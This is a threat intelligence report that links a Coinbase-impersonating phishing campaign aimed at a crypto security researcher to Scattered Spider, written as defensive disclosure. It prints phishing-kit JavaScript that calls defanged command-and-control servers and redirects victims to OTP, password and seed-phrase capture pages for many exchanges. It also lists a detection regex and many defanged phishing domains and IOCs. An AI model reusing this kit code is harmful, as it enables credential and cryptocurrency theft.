CryptoChameleon Campaign Associations with Scattered Spider

Date of Report: 2024 - 12 - 04
Reporting Agency: Cipher
Report Composed By: Cipher
Type of Incident: Social Engineering, Phishing
Phishing Target: @Tayvanno
Estimated Loss: N/A - No user impacts

Executive Summary

Overview: This report is intended to expand upon the functionalities of a threat actor which research indicates is targeting cryptocurrency companies and developers.

Key Information	Detail
Incident Date and Time	`2024-11-30`
Phishing Website	`1735562-coinbase[.]com/captcha?origin=.`
Snapshot of Malicious Site	`https://urlquery.net/report/8cea3a49-64a4-4373-a52a-7c5a73cd5e32`
Attacker Email Sender	`help@xn--conbase-sfb[].]com`
Attacker Phone	`802-772-0215`

Report TLP Classification: 🟢 Green

Incident Background

Phishing Attempt Events

On November 30, 2024, @Tayvano was repeatedly spammed phone calls from 802-772-0215 and was eventually emailed the link 1735562-coinbase[.]com/captcha?origin=. from sender help@xn--conbase-sfb[].]com. Javascript functionality observed from malicious link in question indicates targeted social engineering and phishing attacks originating from IP 195[.]133[.]92[.]187. Analysis by target subject:@Tayvanno found instance control servers: hxxps[://]c26[.]commandandcontrolserver[.]com and hxxps[://]c26x2[.]commandandcontrolserver[.]com/api. Initial threat report and analysis by:@Tayvanno led to further analysis. The purpose of this report is to expand on correlations observed with past known Scattered Spider activity.

Financial Impact

No financial impacts or further user impacts reported, as target subject is highly technical and an information security subject matter expert.

Technical Analysis

Image Not Showing Possible Reasons

The image was uploaded to a note which you don't have access to
The note which the image was originally uploaded to has been deleted

Learn More →

URL	Size	First Seen	Last Seen
1735562-coinbase[.]com/js/index/core[.]js	301 B	2024-12-01 05:51	2024-12-01 05:51
1735562-coinbase[.]com/js/init[.]js	6.9 kB	2024-12-01 05:51	2024-12-01 05:51
cdn[.]socket[.]io/4.5.4/socket[.]io[.]min[.]js	44 kB	2023-03-12 17:27	2024-12-01 11:09
1735562-coinbase[.]com/js/consts[.]js	161 B	2024-12-01 05:51	2024-12-01 05:51
1735562-coinbase[.]com/js/index/script[.]js	232 B	2023-11-19 14:01	2024-12-01 05:51

As stated in the report by Lookout this phishing sample is claimed to be of the "CryptoChameleon" campaign, the attack vector employs the consts[.]js file for communicating to control servers. However, further inspection and random sampling of the credential phishing instances indicate a pattern more greatly aligned with Scattered Spider activity.

const SERVER_URL = 'hxxps[://]c26[.]commandandcontrolserver[.]com';
const API_URL = 'hxxps[://]c26x2[.]commandandcontrolserver[.]com/api';
const OLD_PW_ON_RESET_PAGE = true;

The wide array of redirect functionality can be observed at the path: /js/init[.]js.

expand snippet relevant to `/js/init[.]js` here

    socket.on('userRedirect', async (data) => {
    if (sessionStorage.getItem('user') === data.user && sessionStorage.getItem('user') !== null) {
        const redirectTkn = data.redirectTkn;
        const d = await fetch(`${API_URL}/verify`, {
            method: 'POST',
            headers: {
                'Content-Type': 'application/json'
            },
            body: JSON.stringify({ token: redirectTkn }),
        });
        const res = await d.json();
        if (!res.valid) return;
        const basePath = window.location.href.substring(0, window.location.href.lastIndexOf('/'));
        if (data.response === '/otp_sms' || data.response === '/twitter_sms') { document.location.href = basePath + data.response + '?n=' + data.digits + '&e=' + data.e + '&f=' + data.format; }
        else if (data.response === '/outlook_otp' || data.response === '/binance_sms') { document.location.href = basePath + data.response + '?n=' + data.digits + '&e=' + data.e; }
        else if (data.response === '/custom') { document.location.href = basePath + data.response + '?h=' + data.header + '&p=' + data.paragraph; }

        else if (
            data.response === '/otp_auth' || data.response === '/yahoo' ||
            data.response === '/reset_password' || data.response === '/outlook_pw' ||
            data.response === '/gemini_otp' || data.response === '/gemini_reset' ||
            data.response === '/gemini_seed' || data.response === '/kraken' ||
            data.response === '/kraken_otp' || data.response === '/icloud' ||
            data.response === '/twitter' || data.response === '/twitter_auth' ||
            data.response === '/gmail' || data.response === '/binance' ||
            data.response === '/binance_auth' || data.response === '/gemini_signin' ||
            data.response === '/uphold' || data.response === '/uphold_otp' ||
            data.response === '/uphold_reset' || data.response === '/uphold_seed' ||
            data.response === '/binance_seed' || data.response === '/kraken_seed' ||
            data.response === '/lastpass' || data.response === '/lastpass_otp' ||
            data.response === '/swan' || data.response === '/swan_seed' ||
            data.response === '/swan_eotp' || data.response === '/swan_otp' ||
            data.response === '/swan_auth' || data.response === '/swan_dvc' ||
            data.response === '/gemini_dvc' || data.response === '/kucoin' ||
            data.response === '/kucoin_otp' || data.response === '/kucoin_pin' ||
            data.response === '/kucoin_seed'
        ) { if (data.response === '/gmail' && data.e === 1) { document.location.href = basePath + '/gmail_pw?e=' + data.e; } 
                else { document.location.href = basePath + data.response + '?e=' + data.e; } 
        }
        else if (data.response === '/signin') {
            document.location.href = basePath + data.response + '?e=' + data.e + '&t=' + data.t;
        }

        else if (data.response === '/pending_review') {
            document.location.href = basePath + data.response + '?d=' + btoa(data.date);
        }

        else if (data.response === '/aol_otp' || data.response === '/yahoo_otp' || data.response === '/gmail_otp') {
            document.location.href = basePath + data.response + '?email=' + data.address + '&n=' + data.digits + '&e=' + data.e;
        }

        else if (data.response === '/yahoo_eotp') {
            document.location.href = basePath + data.response + '?email=' + data.address + '&recovery=' + data.recovery + '&e=' + data.e;
        }

        else if (data.response == '/gmail_eotp' || data.response == '/gmail_auth' || data.response == '/otp_email') {
            document.location.href = basePath + data.response + '?email=' + data.address + '&e=' + data.e;
        }

        else if (data.response == '/lastpass_inbox' || data.response == '/dvc_press') {
            document.location.href = basePath + data.response + '?email=' + data.address;
        }

        else if (data.response === '/gmail_device') {
            document.location.href = basePath + data.response + '?email=' + data.address + '&n=' + data.digits + '&app=' + data.app;
        }

        else if (data.response === '/aol' || data.response === '/gmail_backup') {
            document.location.href = basePath + data.response + '?email=' + data.address + '&e=' + data.e;
        }

        else if (data.response === '/seed') {
            document.location.href = basePath + data.response + '?auth=' + data.auth;
        }

        else if (data.response === '/cb_customwallet') {
            document.location.href = basePath + data.response + '?w=' + data.w;
        }

        else if (data.response === '/icloud_otp') {
            document.location.href = basePath + data.response + '?p=' + data.p + '&e=' + data.e;
        }

        else if (data.response === '/device_auth') {
            document.location.href = basePath + data.response + '?device=' + data.device + '&location=' + data.location;
        }

        else if (data.response === '/redirect') {
            document.location.href = basePath + data.response + '?url=' + encodeURIComponent(data.url);
        }

        else if (data.response === '/icloud_2fa') {
            document.location.href = basePath + data.response + '?d=' + data.d;
        }

        else if (data.response === '/cbw1') {
            document.location.href = basePath + data.response + '?s=' + btoa(data.s);
        }

        else {
            document.location.href = basePath + data.response;
        }
    }
});

Domain Research

Domains were searched for using Validin, Censys, Silent Push, and UrlScan[.]io in order to maximize research surface.

Image Not Showing Possible Reasons

The image was uploaded to a note which you don't have access to
The note which the image was originally uploaded to has been deleted

Learn More →

https://www.virustotal.com/graph/embed/g97f881e0970340eca55e0b33440d413ee77a2a8a3c024f7c9dffd7942e36fd8f?theme=dark

Baseline cryptocurrency domain name regex pattern analysis unit:

\b(?:www[.]|\d+[-])?0*\d{5,}-(coinbase|binance|gemini|kraken|ledger|trezor)\[?\.\]?com\b

Unit was utilized to compose a counter pattern to review instances not matching the coinbase

google impersonation sample 2024-12-07:
hxxps[://]cancel-google[.]com/captcha?origin=gmail
https://pro.urlscan.io/result/460e3ae0-9718-431c-b065-84ddab1d525c

Image Not Showing Possible Reasons

The image was uploaded to a note which you don't have access to
The note which the image was originally uploaded to has been deleted

Learn More →

image sourced from:
https://www.researchgate.net/figure/Example-of-homograph-domain-names_fig2_335823813

Domains observed at ip `195[.]133[.]92[.]187` at time of event

expand

12518234-coinbase[.]com
125980-binance[.]com
128594-gemini[.]com
129581-coinbase[.]com
129645-coinbase[.]com
143516-coinbase[.]com
14522564-coinbase[.]com
147852-kraken[.]com
148942-coinbase[.]com
149024-google[.]com
1502759-ledger[.]com
151294-kraken[.]com
152674-coinbase[.]com
157192-uphold[.]com
1581932-coinbase[.]com
158248-gemini[.]com
159120-coinbase[.]com
159823-coinbase[.]com
1652137-coinbase[.]com
17255030-coinbase[.]com
17384624-coinbase[.]com
17503-apple[.]com
1750314-apple[.]com
1759654-coinbase[.]com
17691-coinbase[.]com
177250-cb[.]com
177250-kraken[.]com
178492-coinbase[.]com
178526-coinbase[.]com
179325-coinbase[.]com
18364712-coinbase[.]com
184625-trezor[.]com
1847039-coinbase[.]com
185126-coinbase[.]com
185924-uphold[.]com
19045-coinbase[.]com
191284-gemini[.]com
19243652-coinbase[.]com
19265-coinbase[.]com
19453264-coinbase[.]com
19463752-coinbase[.]com
1947245-google[.]com
194857-kraken[.]com
195-133-92-187[.]waldertype[.]com
195024-coinbase[.]com
19513657-coinbase[.]com
195824-swanbtc[.]com
19642-coinbase[.]com
197287-coinbase[.]com
27954383-coinbase[.]com
283272-coinbase[.]com
298193-coinbase[.]com
489912-coinbase[.]com
53201-coinbase[.]com
592013-apple[.]com
76159869-coinbase[.]com
77195062-coinbase[.]com
848312-coinbase[.]com
884394-coinbase[.]com
917260-coinbase[.]com
923852-coinbase[.]com
administration-icloud[.]com
adsupport-google[.]com
argoworkflow[.]binancesecurity[.]com
bcmone[.]mypasskey[.]info
binancesecurity[.]com
bruno[.]skybluesimply[.]com
calls-coinbase[.]com
cancel-google[.]com
cb-panel[.]com
cdn[.]receipt-coinbase[.]com
coinbase[.]passkeysetup[.]com
coinbasehelpdesk[.]com
coinbasetickets[.]com
cpanel[.]coinbasehelpdesk[.]com
cpcalendars[.]coinbasehelpdesk[.]com
cpcontacts[.]1947245-google[.]com
cpcontacts[.]coinbasehelpdesk[.]com
cpcontacts[.]dashboard-kucoin[.]com
cpcontacts[.]yahoohelpdesk[.]com
dash[.]s-kucoin[.]com
dashboard-kraken[.]com
dashboard-kucoin[.]com
ebdisk[.]17255030-coinbase[.]com
emv1[.]148942-coinbase[.]com
emv1[.]1502759-ledger[.]com
emv1[.]17384624-coinbase[.]com
emv1[.]1759654-coinbase[.]com
emv1[.]19463752-coinbase[.]com
emv1[.]firewall-cb[.]com
emv1[.]lastpasshelp[.]com
emv1[.]protection-kraken[.]com
emv1[.]ticketsupport-coinbase[.]com
establish-coinbase[.]com
firewall-cb[.]com
fraudulent-coinbase[.]com
gamdomrewards[.]com
google[.]mypasskey[.]info
help-applecare[.]com
help-coinbasesupport[.]com
helpdesk-google[.]com
hostmaster[.]msfthelpdesk[.]com
hostmaster[.]www[.]msfthelpdesk[.]com
idsmac-apple[.]com
iticket-apple[.]com
lastpasshelp[.]com
mail[.]coinbasehelpdesk[.]com
mail[.]yahoohelpdesk[.]com
msfthelpdesk[.]com
mypasskey[.]info
passkeysetup[.]com
portal-exodus[.]com
portal-trezor[.]io
protection-kraken[.]com
receipt-coinbase[.]com
refund-cb[.]com
revert-kraken[.]com
s-binance[.]com
s-gemini[.]com
s-kucoin[.]com
secureaccess-coinbase[.]com
shield-cbwallet[.]com
signin-kraken[.]com
signin-swanbitcoin[.]com
staging[.]verification-gemini[.]com
startrecovery-coinbase[.]com
swap-coinbase[.]com
ticketsupport-coinbase[.]com
verification-gemini[.]com
verification-trezor[.]com
verify-ledger[.]com
webdisk[.]coinbasehelpdesk[.]com
webmail[.]coinbasehelpdesk[.]com
www-help-gemini[.]com
www[.]12518234-coinbase[.]com
www[.]125980-binance[.]com
www[.]128594-gemini[.]com
www[.]129581-coinbase[.]com
www[.]129645-coinbase[.]com
www[.]143516-coinbase[.]com
www[.]148942-coinbase[.]com
www[.]149024-google[.]com
www[.]1502759-ledger[.]com
www[.]157192-uphold[.]com
www[.]1581932-coinbase[.]com
www[.]159120-coinbase[.]com
www[.]159823-coinbase[.]com
www[.]1652137-coinbase[.]com
www[.]17255030-coinbase[.]com
www[.]17384624-coinbase[.]com
www[.]1759654-coinbase[.]com
www[.]17691-coinbase[.]com
www[.]178492-coinbase[.]com
www[.]178526-coinbase[.]com
www[.]179325-coinbase[.]com
www[.]18364712-coinbase[.]com
www[.]185126-coinbase[.]com
www[.]185924-uphold[.]com
www[.]19045-coinbase[.]com
www[.]19265-coinbase[.]com
www[.]19453264-coinbase[.]com
www[.]19463752-coinbase[.]com
www[.]1947245-google[.]com
www[.]195024-coinbase[.]com
www[.]19513657-coinbase[.]com
www[.]19642-coinbase[.]com
www[.]197287-coinbase[.]com
www[.]27954383-coinbase[.]com
www[.]283272-coinbase[.]com
www[.]298193-coinbase[.]com
www[.]53201-coinbase[.]com
www[.]592013-apple[.]com
www[.]76159869-coinbase[.]com
www[.]884394-coinbase[.]com
www[.]917260-coinbase[.]com
www[.]923852-coinbase[.]com
www[.]adsupport-google[.]com
www[.]binancesecurity[.]com
www[.]calls-coinbase[.]com
www[.]cancel-google[.]com
www[.]coinbasehelpdesk[.]com
www[.]coinbasetickets[.]com
www[.]emv1[.]protection-kraken[.]com
www[.]establish-coinbase[.]com
www[.]firewall-cb[.]com
www[.]fraudulent-coinbase[.]com
www[.]help-applecare[.]com
www[.]help-coinbasesupport[.]com
www[.]helpdesk-google[.]com
www[.]idsmac-apple[.]com
www[.]iticket-apple[.]com
www[.]lastpasshelp[.]com
www[.]msfthelpdesk[.]com
www[.]passkeysetup[.]com
www[.]portal-trezor[.]io
www[.]protection-kraken[.]com
www[.]receipt-coinbase[.]com
www[.]refund-cb[.]com
www[.]s-binance[.]com
www[.]shield-cbwallet[.]com
www[.]signin-kraken[.]com
www[.]startrecovery-coinbase[.]com
www[.]swap-coinbase[.]com
www[.]ticketsupport-coinbase[.]com
www[.]verification-gemini[.]com
www[.]webmail[.]coinbasehelpdesk[.]com
www[.]www-help-gemini[.]com
www[.]yahoohelpdesk[.]com
yahoohelpdesk[.]com
zsb[.]125980-binance[.]com

Report Objectives

The intentions of this report are to inform cryptocurrency companies and developers of an active phishing campaign which could impact anyone. It is also intended to convey the issue to law enforcement, for their extended analysis, as well as to garner greater interest from the information security community as those perpetuating these instances could modify domain names and expand their reach quite rapidly.

Conclusion

This incident highlights the sophisticated methods used by cybercriminals in phishing campaigns and social engineering attacks. It emphasizes the need for heightened awareness and security measures.

Interaction with Law Enforcement

Agencies Notified: N/A
Notification Date: Report Reference Number:

CryptoChameleon Campaign Associations with Scattered Spider

Executive Summary

Incident Background

Phishing Attempt Events

Financial Impact

Technical Analysis

Domain Research

Domains observed at ip 195[.]133[.]92[.]187 at time of event

Report Objectives

Conclusion

Interaction with Law Enforcement

References and Attachments

Read more

Tornado Cash Analysis

2021 Cryptocurrency Investment Fraud - Shima Capital

Anti-Venom

Cryptocurrency Scam Incident Report @0xPlus7.eth

Domains observed at ip `195[.]133[.]92[.]187` at time of event